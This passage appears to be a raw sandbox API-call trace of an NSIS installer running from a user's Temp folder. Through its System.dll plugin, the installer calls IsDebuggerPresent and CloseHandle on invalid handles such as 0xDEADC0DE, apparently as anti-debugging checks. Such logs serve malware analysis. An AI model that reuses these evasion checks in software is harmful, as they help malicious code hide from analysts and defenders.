lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.847] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.847] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x0 [0157.849] LoadLibraryExA (lpLibFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", hFile=0x0, dwFlags=0x8) returned 0x75710000 [0157.857] VirtualProtect (in: lpAddress=0x7571404c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x7571403c | out: lpflOldProtect=0x7571403c*=0x4) returned 1 [0157.857] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.858] lstrcpyA (in: lpString1=0x3217a0, 
lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.858] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.858] lstrcpyA (in: lpString1=0x321fb0, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0157.858] lstrcpynA (in: lpString1=0x314818, lpString2="Name", iMaxLength=1024 | out: lpString1="Name") returned="Name" [0157.858] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.858] GetProcAddress (hModule=0x75c90000, lpProcName="CreateMutexA") returned 0x75ca4c6b [0157.858] lstrlenA (lpString="CreateMutexA") returned 12 [0157.859] GetProcAddress (hModule=0x75c90000, lpProcName="CreateMutexAA") returned 0x0 [0157.859] lstrcpynA (in: lpString1=0x2fa288, lpString2="Name", iMaxLength=1024 | out: lpString1="Name") returned="Name" [0157.859] lstrcpynA (in: lpString1=0x321398, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.859] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Name") returned 0x180 [0157.859] GetLastError () returned 0x0 [0157.859] lstrcpynA (in: lpString1=0x321398, lpString2="Name", iMaxLength=1024 | out: lpString1="Name") returned="Name" [0157.859] wsprintfA (in: param_1=0x321398, param_2="%d" | out: param_1="0") returned 1 [0157.859] wsprintfA (in: param_1=0x321398, param_2="%d" | out: param_1="0") returned 1 [0157.859] wsprintfA (in: param_1=0x321398, param_2="%d" | out: param_1="384") returned 3 [0157.859] lstrcpyA (in: lpString1=0x430400, lpString2="384" | out: lpString1="384") returned="384" [0157.859] wsprintfA (in: param_1=0x18fb28, param_2="%d" | out: param_1="0") returned 1 [0157.859] lstrcpynA (in: lpString1=0x2fa28c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.859] lstrcpynA (in: lpString1=0x432800, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.860] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: 
lpString1="0") returned="0" [0157.860] lstrlenA (lpString="0") returned 1 [0157.860] lstrcpynA (in: lpString1=0x40ac18, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.860] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.860] lstrcmpiA (lpString1="0", lpString2="0") returned 0 [0157.860] wsprintfA (in: param_1=0x436000, param_2="%d" | out: param_1="1033") returned 4 [0157.860] lstrlenA (lpString="Name") returned 4 [0157.860] lstrcpynA (in: lpString1=0x42ec00, lpString2="Name Setup", iMaxLength=1024 | out: lpString1="Name Setup") returned="Name Setup" [0157.860] SetWindowTextA (hWnd=0x0, lpString="Name Setup") returned 0 [0157.860] lstrcpynA (in: lpString1=0x314ffc, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0157.860] OleInitialize (pvReserved=0x0) returned 0x1 [0157.860] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" [0157.860] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 36 [0157.860] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" [0157.861] CreateDirectoryA (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0157.861] GetLastError () returned 0xb7 [0157.861] GetFileAttributesA (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0157.861] CreateDirectoryA (lpPathName="C:\\Users\\ADU0VK~1" (normalized: "c:\\users\\adu0vk~1"), lpSecurityAttributes=0x0) returned 0 [0157.861] GetLastError () returned 0xb7 [0157.861] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1" (normalized: "c:\\users\\adu0vk~1")) returned 0x10 
[0157.861] CreateDirectoryA (lpPathName="C:\\Users\\ADU0VK~1\\AppData" (normalized: "c:\\users\\adu0vk~1\\appdata"), lpSecurityAttributes=0x0) returned 0 [0157.861] GetLastError () returned 0xb7 [0157.861] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData" (normalized: "c:\\users\\adu0vk~1\\appdata")) returned 0x2012 [0157.862] CreateDirectoryA (lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local" (normalized: "c:\\users\\adu0vk~1\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0157.862] GetLastError () returned 0xb7 [0157.862] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local" (normalized: "c:\\users\\adu0vk~1\\appdata\\local")) returned 0x2010 [0157.862] CreateDirectoryA (lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0157.862] GetLastError () returned 0xb7 [0157.862] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp")) returned 0x2010 [0157.862] lstrcpynA (in: lpString1=0x435800, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" [0157.862] SetCurrentDirectoryA (lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp")) returned 1 [0157.862] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.862] lstrlenA (lpString="") returned 0 [0157.862] lstrcpynA (in: lpString1=0x31400c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.863] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" 
[0157.863] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.863] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.863] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.863] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.863] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.863] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.863] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.863] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.863] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.863] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), 
dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.863] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::IsDebuggerPresent()i.R0", iMaxLength=1024 | out: lpString1="kernel32::IsDebuggerPresent()i.R0") returned="kernel32::IsDebuggerPresent()i.R0" [0157.863] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.864] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.864] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.864] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.864] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.864] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.864] lstrcpyA (in: lpString1=0x321398, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.864] lstrcpyA (in: lpString1=0x3217a8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.864] lstrcpyA (in: lpString1=0x321ba8, lpString2="IsDebuggerPresent" | out: lpString1="IsDebuggerPresent") returned="IsDebuggerPresent" [0157.865] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.865] GetProcAddress (hModule=0x75c90000, lpProcName="IsDebuggerPresent") returned 0x75ca4a5d [0157.865] lstrcpynA (in: lpString1=0x321398, lpString2="", 
iMaxLength=1024 | out: lpString1="") returned="" [0157.865] IsDebuggerPresent () returned 0 [0157.865] wsprintfA (in: param_1=0x321398, param_2="%d" | out: param_1="0") returned 1 [0157.865] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.865] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.865] lstrlenA (lpString="0") returned 1 [0157.865] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.865] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.865] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.865] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.865] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.865] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.866] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.866] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.866] lstrcpynA 
(in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.866] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.866] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.866] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::CloseHandle(i 0)i.R0", iMaxLength=1024 | out: lpString1="kernel32::CloseHandle(i 0)i.R0") returned="kernel32::CloseHandle(i 0)i.R0" [0157.866] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.866] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.866] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.866] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.867] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.867] 
GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.867] lstrcpyA (in: lpString1=0x321398, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.867] lstrcpyA (in: lpString1=0x3217a8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.867] lstrcpyA (in: lpString1=0x321ba8, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0157.868] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.868] GetProcAddress (hModule=0x75c90000, lpProcName="CloseHandle") returned 0x75ca1410 [0157.868] lstrcpynA (in: lpString1=0x321398, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.868] CloseHandle (hObject=0x0) returned 0 [0157.868] wsprintfA (in: param_1=0x321398, param_2="%d" | out: param_1="0") returned 1 [0157.868] wsprintfA (in: param_1=0x321398, param_2="%d" | out: param_1="0") returned 1 [0157.868] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.868] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.868] lstrlenA (lpString="0") returned 1 [0157.868] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.869] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.869] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.869] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.869] lstrcmpiA 
(lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.869] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.869] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.869] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.869] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.869] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.869] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.869] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::CloseHandle(i 0xDEADC0DE)i.R0", iMaxLength=1024 | out: lpString1="kernel32::CloseHandle(i 0xDEADC0DE)i.R0") returned="kernel32::CloseHandle(i 0xDEADC0DE)i.R0" [0157.870] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 
| out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.870] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.870] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.870] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.870] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.870] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.870] lstrcpyA (in: lpString1=0x321398, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.870] lstrcpyA (in: lpString1=0x3217a8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.870] lstrcpyA (in: lpString1=0x321ba8, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0157.870] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.871] GetProcAddress (hModule=0x75c90000, lpProcName="CloseHandle") returned 0x75ca1410 [0157.871] lstrcpynA (in: lpString1=0x321398, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.871] CloseHandle (hObject=0xdeadc0de) returned 0 [0157.871] wsprintfA (in: param_1=0x321398, param_2="%d" | out: param_1="-559038242") returned 10 [0157.871] wsprintfA (in: param_1=0x321398, param_2="%d" | out: param_1="0") returned 1 [0157.871] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.871] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.871] lstrlenA (lpString="0") 
returned 1 [0157.871] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.871] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.871] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.871] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.872] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.872] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.872] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.872] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.872] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.872] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: 
"c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.872] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.872] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::CloseHandle(i 0xFEFEDEAF)i.R0", iMaxLength=1024 | out: lpString1="kernel32::CloseHandle(i 0xFEFEDEAF)i.R0") returned="kernel32::CloseHandle(i 0xFEFEDEAF)i.R0" [0157.872] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.872] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.872] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.873] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.873] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.873] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.873] lstrcpyA (in: lpString1=0x321398, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.873] lstrcpyA (in: lpString1=0x3217a8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.873] lstrcpyA (in: lpString1=0x321ba8, lpString2="CloseHandle" | out: 
